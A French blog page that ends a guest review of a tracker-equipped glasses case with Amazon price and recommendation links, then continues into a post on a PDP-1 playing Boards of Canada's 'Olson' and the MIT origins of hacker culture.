Le seul “reproche” qu’on pourrait lui faire est l’absence de la puce UWB (Ultra-Wideband) présente dans les AirTags d’Apple. Vous n’aurez donc pas la fonction « Localisation précise » avec la petite flèche qui vous guide au centimètre près. Mais honnêtement, pour un objet de cette taille, la sonnerie est bien plus efficace et l’absence de l’UWB ne m’a jamais manqué. Après bien sur, il faut que vos lunettes soient dans leurs étuis, mais c’est une habitude que j’ai pris tout de suite, dès qu’elles ne sont plus sur mon nez, je les pose dans leurs étuis, avec leur petite chiffonette s(au passage je vous recommande ces chiffonnettes là, elles sont incroyables).

Bret, indispensable pour les têtes en l’air

En ce moment elles souvent à moins de 40 euros, et même 33 euros au moment où j’écris ces lignes en cochant un coupon sur Amazon .  Cet étui n’est pas un simple gadget. C’est une assurance tranquillité. Le coût de remplacement d’une seule de mes paires de lunettes justifie à lui seul cet investissement.

Si vous portez des lunettes (de vue, de soleil, etc.) que vous êtes un peu distrait, foncez. C’est le genre de produit intelligent, bien pensé et qui répond à un vrai problème, et en plus c’est aussi un chouette cadeau à faire !

J’en profite pour vous informer que j’ai ouvert une petite page sur Amazon avec tous les produits que je recommande et utilise au quotidien, pensez à y faire un petit saut !

Article invité publié par Vincent Lautier . Vous pouvez aussi faire un saut sur mon blog , ma page de recommandations Amazon , ou lire tous les tests que je publie dans la catégorie “Gadgets Tech” , comme cette liseuse Android de dingue ou ces AirTags pour Android !

Le youtubeur Joe Lynch vient de faire jouer “ Olson ” de Boards of Canada sur un ordinateur de 1959. Pas un émulateur, hein mais le vrai PDP-1, celui qui est au Computer History Museum. 603 bytes de musique sur une bande perforée, et quatre ampoules sur le panneau de contrôle transformées en haut-parleurs… Le son est brut, lo-fi, presque primitif et je trouve ça magnifique.

Mais attendez, ce PDP-1 c’est pas juste un vieux tas de circuits et de câbles… C’est vraiment l’ordinateur qui a créé les hackers et je vais essayer de vous en raconter un peu l’histoire !

Le PDP-1 débarque au MIT en septembre 1961. Digital Equipment Corporation le vend alors 120 000 dollars en tant qu’outil de calcul scientifique. C’est très sérieux, très corporate, sauf que les étudiants du MIT s’en foutent du calcul scientifique.

Ils veulent jouer !

Steve Russell programme alors Spacewar! en 1962. C’est l’un des premiers jeu vidéo. Deux vaisseaux qui se tirent dessus autour d’une étoile et vous vous en doutez, c’est pas prévu dans le manuel. C’est un détournement de la machine… un hack.

Puis la même année, Peter Samson , un autre étudiant du MIT, remarque que les ampoules de statut du PDP-1 clignotent. On/off, on/off… Il se dit alors qu’en contrôlant la vitesse du clignotement, on peut générer des fréquences audio. Il code alors le Harmony Compiler et c’est comme ça que les quatre ampoules deviennent quatre voix musicales. C’est l’un des premier synthétiseur temps réel et polyphonique de l’histoire. Peter optimise même le système pour jouer du Bach.

C’est la naissance de la culture hacker, de l’idée que le matériel peut faire plus que ce pour quoi il a été conçu et vendu. Les limites sont là pour être contournées et ce n’est pas mal… c’est de l’exploration !

Le PDP-1 devient alors le terrain de jeu des premiers hackers du MIT. Ils codent la nuit, quand les profs sont partis et transforment cette machine de calcul en espace de créativité. Et cette étincelle de culture va créer tout ce qui suit. Unix en 1969, le Homebrew Computer Club dans les années 70, les premiers PC, l’open source, Linux…etc. A chaque fois, ce sont des étudiants qui ont décidé que les règles c’était optionnel.

Et 63 ans plus tard, Joe Lynch arrive, prend le code de Peter Samson écrit en 1962 et l’utilise pour faire jouer un morceau de 1998. Il perfore une bande papier, il la charge dans le PDP-1, les fameuses quatre ampoules s’allument et s’éteignent alors à des fréquences calculées pour l’occasion et c’est “Olson” qui sort des haut-parleurs.